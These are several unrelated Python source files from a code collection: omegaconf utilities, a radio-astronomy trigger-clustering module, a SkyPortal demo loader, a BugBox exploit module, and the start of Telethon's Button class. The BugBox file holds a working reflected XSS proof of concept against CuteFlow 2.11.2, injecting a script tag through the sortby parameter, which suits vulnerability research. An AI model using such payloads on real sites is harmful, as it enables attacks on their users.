ex.value = value
ex.object_type = object_type
ex.object_type_str = object_type_str
ex.ref_type = ref_type
ex.ref_type_str = ref_type_str
_raise(ex, cause)
def type_str(t: Any, include_module_name: bool = False) -> str:
is_optional, t = _resolve_optional(t)
if t is None:
return type(t).__name__
if t is Any:
return "Any"
if t is ...:
return "..."
if sys.version_info < (3, 7, 0): # pragma: no cover
# Python 3.6
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t.__origin__ is not None:
name = type_str(t.__origin__)
else:
name = str(t)
if name.startswith("typing."):
name = name[len("typing.") :]
else: # pragma: no cover
# Python >= 3.7
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t._name is None:
if t.__origin__ is not None:
name = type_str(
t.__origin__, include_module_name=include_module_name
)
else:
name = str(t._name)
args = getattr(t, "__args__", None)
if args is not None:
args = ", ".join(
[type_str(t, include_module_name=include_module_name) for t in t.__args__]
)
ret = f"{name}[{args}]"
else:
ret = name
if include_module_name:
if (
hasattr(t, "__module__")
and t.__module__ != "builtins"
and t.__module__ != "typing"
and not t.__module__.startswith("omegaconf.")
):
module_prefix = t.__module__ + "."
else:
module_prefix = ""
ret = module_prefix + ret
if is_optional:
return f"Optional[{ret}]"
else:
return ret
def _ensure_container(target: Any, flags: Optional[Dict[str, bool]] = None) -> Any:
from omegaconf import OmegaConf
if is_primitive_container(target):
assert isinstance(target, (list, dict))
target = OmegaConf.create(target, flags=flags)
elif is_structured_config(target):
target = OmegaConf.structured(target, flags=flags)
elif not OmegaConf.is_config(target):
raise ValueError(
"Invalid input. Supports one of "
+ "[dict,list,DictConfig,ListConfig,dataclass,dataclass instance,attr class,attr class instance]"
)
return target
def is_generic_list(type_: Any) -> bool:
"""
Checks if a type is a generic list, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_list_annotation(type_) and get_list_element_type(type_) is not None
def is_generic_dict(type_: Any) -> bool:
"""
Checks if a type is a generic dict, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_dict_annotation(type_) and len(get_dict_key_value_types(type_)) > 0
def is_container_annotation(type_: Any) -> bool:
return is_list_annotation(type_) or is_dict_annotation(type_)
def split_key(key: str) -> List[str]:
"""
Split a full key path into its individual components.
This is similar to `key.split(".")` but also works with the getitem syntax:
"a.b" -> ["a", "b"]
"a[b]" -> ["a, "b"]
".a.b[c].d" -> ["", "a", "b", "c", "d"]
"[a].b" -> ["a", "b"]
"""
# Obtain the first part of the key (in docstring examples: a, a, .a, '')
first = KEY_PATH_HEAD.match(key)
assert first is not None
first_stop = first.span()[1]
# `tokens` will contain all elements composing the key.
tokens = key[0:first_stop].split(".")
# Optimization in case `key` has no other component: we are done.
if first_stop == len(key):
return tokens
if key[first_stop] == "[" and not tokens[-1]:
# This is a special case where the first key starts with brackets, e.g.
# [a] or ..[a]. In that case there is an extra "" in `tokens` that we
# need to get rid of:
# [a] -> tokens = [""] but we would like []
# ..[a] -> tokens = ["", "", ""] but we would like ["", ""]
tokens.pop()
# Identify other key elements (in docstring examples: b, b, b/c/d, b)
others = KEY_PATH_OTHER.findall(key[first_stop:])
# There are two groups in the `KEY_PATH_OTHER` regex: one for keys starting
# with a dot (.b, .d) and one for keys starting with a bracket ([b], [c]).
# Only one group can be non-empty.
tokens += [dot_key if dot_key else bracket_key for dot_key, bracket_key in others]
return tokens
# Similar to Python 3.7+'s `contextlib.nullcontext` (which should be used instead,
# once support for Python 3.6 is dropped).
@contextmanager
def nullcontext(enter_result: Any = None) -> Iterator[Any]:
yield enter_result
| 2.328125 | 2 |
darc/amber_clustering.py | loostrum/darc | 0 | 3331 | <gh_stars>0
#!/usr/bin/env python3
#
# AMBER Clustering
import os
from time import sleep
import yaml
import ast
import threading
import multiprocessing as mp
import numpy as np
from astropy.time import Time, TimeDelta
import astropy.units as u
from astropy.coordinates import SkyCoord
from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer
from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT
from darc.external import tools
from darc import util
class AMBERClusteringException(Exception):
pass
class AMBERClustering(DARCBase):
"""
Trigger IQUV / LOFAR / VOEvent system based on AMBER candidates
1. Cluster incoming triggers
2. Apply thresholds (separate for known and new sources, and for IQUV vs LOFAR)
3. Put IQUV triggers on output queue
4. Put LOFAR triggers on remote LOFAR trigger queue and on VOEvent queue
"""
def __init__(self, *args, connect_vo=True, connect_lofar=True, **kwargs):
"""
:param bool connect_vo: Whether or not to connect to VOEvent queue on master node
:param bool connect_lofar: Whether or not to connect to LOFAR trigger queue on master node
"""
super(AMBERClustering, self).__init__(*args, **kwargs)
self.connect_vo = connect_vo
self.connect_lofar = connect_lofar
self.dummy_queue = mp.Queue()
self.threads = {}
self.hdr_mapping = {}
self.obs_config = None
self.observation_running = False
self.amber_triggers = []
self.source_list = None
self.lock = mp.Lock()
# store when we are allowed to do IQUV / LOFAR triggering
self.time_iquv = Time.now()
# connect to VOEvent generator
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
else:
# dummy queue
self.logger.info("VO Generator connection disabled, setting dummy queue")
self.vo_queue = mp.Queue()
self.have_vo = False
# connect to LOFAR trigger
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
else:
# dummy queue
self.logger.info("LOFAR Trigger connection disabled, setting dummy queue")
self.lofar_queue = mp.Queue()
self.have_lofar = False
def _load_source_list(self):
"""
Load the list with known source DMs
:return: source list with dict per category
"""
try:
with open(self.source_file, 'r') as f:
source_list = yaml.load(f, Loader=yaml.SafeLoader)
except OSError as e:
raise AMBERClusteringException("Cannot load source list: {}".format(e))
return source_list
def process_command(self, command):
"""
Process command received from queue
:param dict command: Command to process
"""
if command['command'] == 'trigger':
if not self.observation_running:
self.logger.error("Trigger(s) received but no observation is running - ignoring")
else:
with self.lock:
self.amber_triggers.append(command['trigger'])
elif command['command'] == 'get_attr':
self.get_attribute(command)
else:
self.logger.error("Unknown command received: {}".format(command['command']))
def start_observation(self, obs_config, reload=True):
"""
Parse obs config and start listening for amber triggers on queue
:param dict obs_config: Observation configuration
:param bool reload: reload service settings (default: True)
"""
# reload config
if reload:
self.load_config()
# clean any old triggers
self.amber_triggers = []
# parse parset
obs_config['parset'] = self._load_parset(obs_config)
# set config
self.obs_config = obs_config
self.observation_running = True
# (re)load source list in case of changes
self.source_list = self._load_source_list()
# try connecting to VO server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
# try connecting to LOFAR trigger serverr if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
# process triggers in thread
self.threads['processing'] = threading.Thread(target=self._process_triggers)
self.threads['processing'].start()
self.logger.info("Observation started")
def stop_observation(self, *args, **kwargs):
"""
Stop observation
"""
# set running to false
self.observation_running = False
# clear triggers
self.amber_triggers = []
# clear header
self.hdr_mapping = {}
# clear config
self.obs_config = None
# clear threads
for key, thread in self.threads.items():
if thread is not None:
thread.join()
self.threads[key] = None
def voevent_connector(self):
"""
Connect to the VOEvent generator on the master node
"""
# Load VO server settings
VOEventQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['voevent_generator']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = VOEventQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def lofar_connector(self):
"""
Connect to the LOFAR triggering system on the master node
"""
# Load LOFAR trigger server settings
LOFARTriggerQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['lofar_trigger']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = LOFARTriggerQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def _get_source(self):
"""
Try to get DM for a known source
:return: DM for known source, else None
"""
# get source name from parset
try:
source = self.obs_config['parset']['task.source.name']
except KeyError:
self.logger.error("Cannot get source name from parset, will not do known-source triggering")
return None, None, None
# check if source is in source list
# first check aliases
try:
alias = self.source_list['aliases'][source]
except KeyError:
# not found
pass
else:
# replace source by alias so we can look it up in other lists
self.logger.info("Using alias {} for source {}".format(alias, source))
source = alias
# check if source is a known pulsar or frb
dm_src = None
src_type = None
for key in ['pulsars', 'frbs']:
try:
dm_src = self.source_list[key][source]
src_type = key[:-1]
except KeyError:
pass
else:
break
return dm_src, src_type, source
def _check_triggers(self, triggers, sys_params, utc_start, datetimesource, dm_min=0, dm_max=np.inf, dm_src=None,
width_max=np.inf, snr_min=8, src_type=None, src_name=None, dmgal=0, pointing=None,
skip_lofar=False):
"""
Cluster triggers and run IQUV and/or LOFAR triggering
:param list triggers: Raw triggers
:param dict sys_params: System parameters (dt, delta_nu_MHz, nu_GHz)
:param str utc_start: start time of observation, in format readable by astropy.time.Time
:param str datetimesource: Field name with date and time
:param float dm_min: minimum DM (default: 0)
:param float dm_max: maximum DM (default: inf)
:param float dm_src: DM of known source (default: None)
:param float width_max: maximum width (default: inf)
:param float snr_min: mininum S/N (default: 8)
:param str src_type: Source type (pulsar, frb, None)
:param str src_name: Source name (default: None)
:param float dmgal: galactic maximum DM
:param astropy.coordinates.SkyCoord pointing: Pointing for LOFAR triggering (default: None)
:param bool skip_lofar: Skip LOFAR triggering (default: False)
"""
# cluster using IQUV thresholds
# LOFAR thresholds are assumed to be more strict for every parameter
cluster_snr, cluster_dm, cluster_time, cluster_downsamp, cluster_sb, _, ncand_per_cluster = \
tools.get_triggers(triggers,
dm_min=dm_min, dm_max=dm_max, sig_thresh=snr_min, t_window=self.clustering_window,
read_beam=True, return_clustcounts=True, sb_filter=self.sb_filter,
sb_filter_period_min=self.sb_filter_period_min,
sb_filter_period_max=self.sb_filter_period_max,
**sys_params)
# select on width
mask = np.array(cluster_downsamp) <= width_max
cluster_snr = np.array(cluster_snr)[mask]
cluster_dm = np.array(cluster_dm)[mask]
cluster_time = np.array(cluster_time)[mask]
cluster_downsamp = np.array(cluster_downsamp)[mask].astype(int)
cluster_sb = np.array(cluster_sb)[mask].astype(int)
ncand_per_cluster = np.array(ncand_per_cluster)[mask].astype(int)
ncluster = len(cluster_snr)
if src_type is not None:
known = 'known'
else:
known = 'new'
self.logger.info("Clustered {} raw triggers into {} IQUV trigger(s) "
"for {} source".format(len(triggers), ncluster, known))
# return if there are no clusters
if ncluster == 0:
return
# there are clusters, do IQUV triggering
# check if we can do triggering
now = Time.now()
if now < self.time_iquv:
self.logger.warning("Cannot trigger IQUV yet, next possible time: {}".format(self.time_iquv))
else:
self.logger.info("Sending IQUV trigger")
# update last trigger time
self.time_iquv = now + TimeDelta(self.thresh_iquv['interval'], format='sec')
# trigger IQUV
dada_triggers = []
for i in range(ncluster):
# send known source dm if available
if dm_src is not None:
dm_to_send = dm_src
else:
dm_to_send = cluster_dm[i]
dada_trigger = {'stokes': 'IQUV', 'dm': dm_to_send, 'beam': cluster_sb[i],
'width': cluster_downsamp[i], 'snr': cluster_snr[i],
'time': cluster_time[i], 'utc_start': utc_start}
dada_triggers.append(dada_trigger)
self.target_queue.put({'command': 'trigger', 'trigger': dada_triggers})
# skip LOFAR triggering for pulsars or if explicitly disabled
if src_type == 'pulsar' or skip_lofar:
return
# select LOFAR thresholds
if src_type is not None:
# known source, use same DM threshold as IQUV, but apply width and S/N thresholds
# DM_min effectively does nothing here because the value is the same as for IQUV
# but it needs to be defined for the mask = line below to work
# no limit on candidates per cluster
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = dm_min
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = np.inf
# Overrides for specific sources
if src_name in self.lofar_trigger_sources:
# check CB number
try:
allowed_cbs = self.thresh_lofar_override['cb']
if isinstance(allowed_cbs, float):
allowed_cbs = [allowed_cbs]
if self.obs_config['beam'] not in allowed_cbs:
return
except KeyError:
# any CB is valid if cb key is not present
pass
else:
# source known, CB valid: set thresholds
snr_min_lofar = self.thresh_lofar_override['snr_min']
width_max_lofar = self.thresh_lofar_override['width_max']
self.logger.warning("Setting LOFAR trigger thresholds: S/N > {}, "
"downsamp <= {}".format(snr_min_lofar, width_max_lofar))
else:
# new source, apply all LOFAR thresholds
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = max(dmgal * self.thresh_lofar['dm_frac_min'], self.dm_min_global)
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = self.thresh_lofar['max_cands_per_cluster']
# create mask for given thresholds
# also remove triggers where number of raw candidates is too high (this indicates RFI)
mask = (cluster_snr >= snr_min_lofar) & (cluster_dm >= dm_min_lofar) & \
(cluster_downsamp <= width_max_lofar) & \
(ncand_per_cluster <= max_cands_per_cluster)
# check for any remaining triggers
if np.any(mask):
ncluster = np.sum(mask)
self.logger.info("Found {} possible LOFAR trigger(s)".format(ncluster))
# note: the server keeps track of when LOFAR triggers were sent
# and whether or not a new trigger can be sent
# check if there are multiple triggers
if ncluster > 1:
self.logger.info("Multiple triggers - selecting trigger with highest S/N")
# argmax also works if there is one trigger, so just run it always
ind = np.argmax(cluster_snr[mask])
# estimate flux density based on peak S/N and width
snr = cluster_snr[mask][ind]
width = TSAMP.to(u.ms) * cluster_downsamp[mask][ind]
# astropy units only knows mJy, but the VOEvent Generator expects Jy
flux = util.get_flux(snr, width).to(u.mJy).value / 1000.
# select known source DM if available
if dm_src is not None:
dm_to_send = dm_src
dm_err = 0.
else:
dm_to_send = cluster_dm[mask][ind]
# set DM uncertainty to DM delay across pulse width
# Apertif has roughly 1 DM unit = 1 ms delay across band
dm_err = width.to(u.ms).value
# calculate arrival time at reference frequency = central frequency
cent_freq = sys_params['nu_GHz'] * 1000.
max_freq = cent_freq + .5 * BANDWIDTH.to(u.MHz).value
dm_delay = 4.148808E3 * dm_to_send * (cent_freq**-2 - max_freq**-2)
utc_arr = (utc_start + TimeDelta(cluster_time[mask][ind] - dm_delay, format='sec')).isot
# set a source name
if src_type is not None:
name = src_type
else:
name = 'candidate'
# check whether or not pointing information is available
if pointing is None:
self.logger.error("No pointing information available - cannot trigger LOFAR")
# check if we are connected to the server
elif not self.have_lofar:
self.logger.error("No LOFAR Trigger connection available - cannot trigger LOFAR")
# do the trigger
else:
# create the full trigger and put on VO queue
lofar_trigger = {'dm': dm_to_send,
'dm_err': dm_err,
'width': width.to(u.ms).value, # ms
'snr': snr,
'flux': flux, # Jy
'ra': pointing.ra.deg, # decimal deg
'dec': pointing.dec.deg, # decimal deg
'cb': self.obs_config['beam'],
'sb': cluster_sb[mask][ind],
'ymw16': dmgal,
'semiMaj': 15, # arcmin, CB
'semiMin': 15, # arcmin, CB
'name': name,
'src_name': src_name,
'datetimesource': datetimesource,
'utc': utc_arr,
'tarr': cluster_time[mask][ind],
'importance': 0.1}
# add system parameters (dt, central freq (GHz), bandwidth (MHz))
lofar_trigger.update(sys_params)
self.logger.info("Sending LOFAR trigger to LOFAR Trigger system")
self.lofar_queue.put(lofar_trigger)
if self.have_vo:
self.logger.info("Sending same trigger to VOEvent system")
self.vo_queue.put(lofar_trigger)
else:
self.logger.error("No VOEvent Generator connection available - not sending VO trigger")
def _process_triggers(self):
"""
Read thresholds (DM, width, S/N) for clustering
Continuously read AMBER triggers from queue and start processing for known and/or new sources
"""
# set observation parameters
utc_start = Time(self.obs_config['startpacket'] / TIME_UNIT, format='unix')
datetimesource = self.obs_config['datetimesource']
dt = TSAMP.to(u.second).value
chan_width = (BANDWIDTH / float(NCHAN)).to(u.MHz).value
cent_freq = (self.obs_config['min_freq'] * u.MHz + 0.5 * BANDWIDTH).to(u.GHz).value
sys_params = {'dt': dt, 'delta_nu_MHz': chan_width, 'nu_GHz': cent_freq}
pointing = self._get_pointing()
dmgal = util.get_ymw16(self.obs_config['parset'], self.obs_config['beam'], self.logger)
# get known source dm and type
dm_src, src_type, src_name = self._get_source()
if src_type is not None:
thresh_src = {'dm_src': dm_src,
'src_type': src_type,
'src_name': src_name,
'dm_min': max(dm_src - self.dm_range, self.dm_min_global),
'dm_max': dm_src + self.dm_range,
'width_max': np.inf,
'snr_min': self.snr_min_global,
'pointing': pointing,
'dmgal': dmgal
}
self.logger.info("Setting {src_name} trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}".format(**thresh_src))
# set min and max DM for new sources with unknown DM
thresh_new = {'src_type': None,
'src_name': None,
'dm_min': max(dmgal * self.thresh_iquv['dm_frac_min'], self.dm_min_global),
'dm_max': np.inf,
'width_max': self.thresh_iquv['width_max'],
'snr_min': self.thresh_iquv['snr_min'],
'pointing': pointing,
'dmgal': dmgal
}
# if known source, check whether or not LOFAR triggering should be enabled for new sources
if src_type is not None and src_name in self.lofar_trigger_sources:
thresh_new['skip_lofar'] = not self.thresh_lofar['trigger_on_new_sources']
else:
thresh_new['skip_lofar'] = False
self.logger.info("Setting new source trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}, skip LOFAR "
"triggering={skip_lofar}".format(**thresh_new))
# main loop
while self.observation_running:
if self.amber_triggers:
# Copy the triggers so class-wide list can receive new triggers without those getting lost
with self.lock:
triggers = self.amber_triggers
self.amber_triggers = []
# check for header (always, because it is received once for every amber instance)
if not self.hdr_mapping:
for trigger in triggers:
if trigger.startswith('#'):
# read header, remove comment symbol
header = trigger.split()[1:]
self.logger.info("Received header: {}".format(header))
# Check if all required params are present and create mapping to col index
keys = ['beam_id', 'integration_step', 'time', 'DM', 'SNR']
for key in keys:
try:
self.hdr_mapping[key] = header.index(key)
except ValueError:
self.logger.error("Key missing from clusters header: {}".format(key))
self.hdr_mapping = {}
return
# header should be present now
if not self.hdr_mapping:
self.logger.error("First clusters received but header not found")
continue
# remove headers from triggers (i.e. any trigger starting with #)
triggers = [trigger for trigger in triggers if not trigger.startswith('#')]
# triggers is empty if only header was received
if not triggers:
self.logger.info("Only header received - Canceling processing")
continue
# split strings and convert to numpy array
try:
triggers = np.array(list(map(lambda val: val.split(), triggers)), dtype=float)
except Exception as e:
self.logger.error("Failed to process triggers: {}".format(e))
continue
# pick columns to feed to clustering algorithm
triggers_for_clustering = triggers[:, (self.hdr_mapping['DM'], self.hdr_mapping['SNR'],
self.hdr_mapping['time'], self.hdr_mapping['integration_step'],
self.hdr_mapping['beam_id'])]
# known source and new source triggering, in thread so clustering itself does not
# delay next run
# known source triggering
if src_type is not None:
self.threads['trigger_known_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_src)
self.threads['trigger_known_source'].start()
# new source triggering
self.threads['trigger_new_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_new)
self.threads['trigger_new_source'].start()
sleep(self.interval)
self.logger.info("Observation finished")
def _get_pointing(self):
"""
Get pointing of this CB from parset
:return: pointing SkyCoord
"""
# read parset
try:
parset = self.obs_config['parset']
except KeyError as e:
self.logger.error("Cannot read parset ({})".format(e))
return None
# read beam
try:
beam = self.obs_config['beam']
except KeyError as e:
self.logger.error("Cannot read beam from parset, setting CB to 0 ({})".format(e))
beam = 0
# read beam coordinates from parset
try:
key = "task.beamSet.0.compoundBeam.{}.phaseCenter".format(beam)
c1, c2 = ast.literal_eval(parset[key].replace('deg', ''))
c1 = c1 * u.deg
c2 = c2 * u.deg
except Exception as e:
self.logger.error("Could not parse pointing for CB{:02d} ({})".format(beam, e))
return None
# convert HA to RA if HADEC is used
if parset['task.directionReferenceFrame'].upper() == 'HADEC':
# Get RA at the mid point of the observation
timestamp = Time(parset['task.startTime']) + .5 * float(parset['task.duration']) * u.s
c1, c2 = util.radec_to_hadec(c1, c2, timestamp)
# create SkyCoord object
pointing = SkyCoord(c1, c2)
return pointing
def _load_parset(self, obs_config):
"""
Load the observation parset
:param dict obs_config: Observation config
:return: parset as dict
"""
try:
# encoded parset is already in config on master node
# decode the parset
raw_parset = util.decode_parset(obs_config['parset'])
# convert to dict and store
parset = util.parse_parset(raw_parset)
except KeyError:
self.logger.info("Observation parset not found in input config, looking for master parset")
# Load the parset from the master parset file
master_config_file = os.path.join(obs_config['master_dir'], 'parset', 'darc_master.parset')
try:
# Read raw config
with open(master_config_file) as f:
master_config = f.read().strip()
# Convert to dict
master_config = util.parse_parset(master_config)
# extract obs parset and decode
raw_parset = util.decode_parset(master_config['parset'])
parset = util.parse_parset(raw_parset)
except Exception as e:
self.logger.warning(
"Failed to load parset from master config file {}, "
"setting parset to None: {}".format(master_config_file, e))
parset = None
return parset
| 2.140625 | 2 |
tools/load_demo_data.py | glenn2763/skyportal | 0 | 3332 | import datetime
import os
import subprocess
import base64
from pathlib import Path
import shutil
import pandas as pd
import signal
import requests
from baselayer.app.env import load_env
from baselayer.app.model_util import status, create_tables, drop_tables
from social_tornado.models import TornadoStorage
from skyportal.models import init_db, Base, DBSession, Source, User
from skyportal.model_util import setup_permissions, create_token
from skyportal.tests import api
from baselayer.tools.test_frontend import verify_server_availability
if __name__ == "__main__":
"""Insert test data"""
env, cfg = load_env()
basedir = Path(os.path.dirname(__file__)) / ".."
with status(f"Connecting to database {cfg['database']['database']}"):
init_db(**cfg["database"])
with status("Dropping all tables"):
drop_tables()
with status("Creating tables"):
create_tables()
for model in Base.metadata.tables:
print(" -", model)
with status(f"Creating permissions"):
setup_permissions()
with status(f"Creating dummy users"):
super_admin_user = User(
username="<EMAIL>", role_ids=["Super admin"]
)
group_admin_user = User(
username="<EMAIL>", role_ids=["Super admin"]
)
full_user = User(username="<EMAIL>", role_ids=["Full user"])
view_only_user = User(
username="<EMAIL>", role_ids=["View only"]
)
DBSession().add_all(
[super_admin_user, group_admin_user, full_user, view_only_user]
)
for u in [super_admin_user, group_admin_user, full_user, view_only_user]:
DBSession().add(
TornadoStorage.user.create_social_auth(u, u.username, "google-oauth2")
)
with status("Creating token"):
token = create_token(
[
"Manage groups",
"Manage sources",
"Upload data",
"Comment",
"Manage users",
],
super_admin_user.id,
"load_demo_data token",
)
def assert_post(endpoint, data):
response_status, data = api("POST", endpoint, data, token)
if not response_status == 200 and data["status"] == "success":
raise RuntimeError(
f'API call to {endpoint} failed with status {status}: {data["message"]}'
)
return data
with status("Launching web app & executing API calls"):
try:
response_status, data = api("GET", "sysinfo", token=token)
app_already_running = True
except requests.ConnectionError:
app_already_running = False
web_client = subprocess.Popen(
["make", "run"], cwd=basedir, preexec_fn=os.setsid
)
server_url = f"http://localhost:{cfg['ports.app']}"
print()
print(f"Waiting for server to appear at {server_url}...")
try:
verify_server_availability(server_url)
print("App running - continuing with API calls")
with status("Creating dummy group & adding users"):
data = assert_post(
"groups",
data={
"name": "Stream A",
"group_admins": [
super_admin_user.username,
group_admin_user.username,
],
},
)
group_id = data["data"]["id"]
for u in [view_only_user, full_user]:
data = assert_post(
f"groups/{group_id}/users/{u.username}", data={"admin": False}
)
with status("Creating dummy instruments"):
data = assert_post(
"telescope",
data={
"name": "Palomar 1.5m",
"nickname": "P60",
"lat": 33.3633675,
"lon": -116.8361345,
"elevation": 1870,
"diameter": 1.5,
"group_ids": [group_id],
},
)
telescope1_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "P60 Camera",
"type": "phot",
"band": "optical",
"telescope_id": telescope1_id,
},
)
instrument1_id = data["data"]["id"]
data = assert_post(
"telescope",
data={
"name": "Nordic Optical Telescope",
"nickname": "NOT",
"lat": 28.75,
"lon": 17.88,
"elevation": 1870,
"diameter": 2.56,
"group_ids": [group_id],
},
)
telescope2_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "ALFOSC",
"type": "both",
"band": "optical",
"telescope_id": telescope2_id,
},
)
with status("Creating dummy sources"):
SOURCES = [
{
"id": "14gqr",
"ra": 353.36647,
"dec": 33.646149,
"redshift": 0.063,
"group_ids": [group_id],
"comments": [
"No source at transient location to R>26 in LRIS imaging",
"Strong calcium lines have emerged.",
],
},
{
"id": "16fil",
"ra": 322.718872,
"dec": 27.574113,
"redshift": 0.0,
"group_ids": [group_id],
"comments": ["Frogs in the pond", "The eagle has landed"],
},
]
(basedir / "static/thumbnails").mkdir(parents=True, exist_ok=True)
for source_info in SOURCES:
comments = source_info.pop("comments")
data = assert_post("sources", data=source_info)
assert data["data"]["id"] == source_info["id"]
for comment in comments:
data = assert_post(
"comment",
data={"source_id": source_info["id"], "text": comment},
)
phot_file = basedir / "skyportal/tests/data/phot.csv"
phot_data = pd.read_csv(phot_file)
data = assert_post(
"photometry",
data={
"source_id": source_info["id"],
"time_format": "iso",
"time_scale": "utc",
"instrument_id": instrument1_id,
"observed_at": phot_data.observed_at.tolist(),
"mag": phot_data.mag.tolist(),
"e_mag": phot_data.e_mag.tolist(),
"lim_mag": phot_data.lim_mag.tolist(),
"filter": phot_data["filter"].tolist(),
},
)
spec_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"skyportal",
"tests",
"data",
"spec.csv",
)
spec_data = pd.read_csv(spec_file)
for i, df in spec_data.groupby("instrument_id"):
data = assert_post(
"spectrum",
data={
"source_id": source_info["id"],
"observed_at": str(datetime.datetime(2014, 10, 24)),
"instrument_id": 1,
"wavelengths": df.wavelength.tolist(),
"fluxes": df.flux.tolist(),
},
)
for ttype in ["new", "ref", "sub"]:
fname = f'{source_info["id"]}_{ttype}.png'
fpath = basedir / f"skyportal/tests/data/{fname}"
thumbnail_data = base64.b64encode(
open(os.path.abspath(fpath), "rb").read()
)
data = assert_post(
"thumbnail",
data={
"source_id": source_info["id"],
"data": thumbnail_data,
"ttype": ttype,
},
)
source = Source.query.get(source_info["id"])
source.add_linked_thumbnails()
finally:
if not app_already_running:
print("Terminating web app")
os.killpg(os.getpgid(web_client.pid), signal.SIGTERM)
| 1.875 | 2 |
framework/Exploits/CUTEFLOW_0024.py | UncleWillis/BugBox | 1 | 3333 |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0024",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/showmaillist.php?sortby=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
| 2.40625 | 2 |
telethon/tl/custom/button.py | HosseyNJF/Telethon | 4 | 3334 | <reponame>HosseyNJF/Telethon
from .. import types
from ... import utils
class Button:
"""
.. note::
This class is used to **define** reply markups, e.g. when
sending a message or replying to events. When you access
`Message.buttons <telethon.tl.custom.message.Message.buttons>`
they are actually `MessageButton
<telethon.tl.custom.messagebutton.MessageButton>`,
so you might want to refer to that class instead.
Helper class to allow defining ``reply_markup`` when
sending a message with inline or keyboard buttons.
You should make use of the defined class methods to create button
instances instead making them yourself (i.e. don't do ``Button(...)``
but instead use methods line `Button.inline(...) <inline>` etc.
You can use `inline`, `switch_inline`, `url` and `auth`
together to create inline buttons (under the message).
You can use `text`, `request_location`, `request_phone` and `request_poll`
together to create a reply markup (replaces the user keyboard).
You can also configure the aspect of the reply with these.
The latest message with a reply markup will be the one shown to the user
(messages contain the buttons, not the chat itself).
You **cannot** mix the two type of buttons together,
and it will error if you try to do so.
The text for all buttons may be at most 142 characters.
If more characters are given, Telegram will cut the text
to 128 characters and add the ellipsis (…) character as
the 129.
"""
def __init__(self, button, *, resize, single_use, selective):
self.button = button
self.resize = resize
self.single_use = single_use
self.selective = selective
@staticmethod
def _is_inline(button):
"""
Returns `True` if the button belongs to an inline keyboard.
"""
return isinstance(button, (
types.KeyboardButtonCallback,
types.KeyboardButtonSwitchInline,
types.KeyboardButtonUrl,
types.InputKeyboardButtonUrlAuth
))
@staticmethod
def inline(text, data=None):
"""
Creates a new inline button with some payload data in it.
If `data` is omitted, the given `text` will be used as `data`.
In any case `data` should be either `bytes` or `str`.
Note that the given `data` must be less or equal to 64 bytes.
If more than 64 bytes are passed as data, ``ValueError`` is raised.
If you need to store more than 64 bytes, consider saving the real
data in a database and a reference to that data inside the button.
When the user clicks this button, `events.CallbackQuery
<telethon.events.callbackquery.CallbackQuery>` will trigger with the
same data that the button contained, so that you can determine which
button was pressed.
"""
if not data:
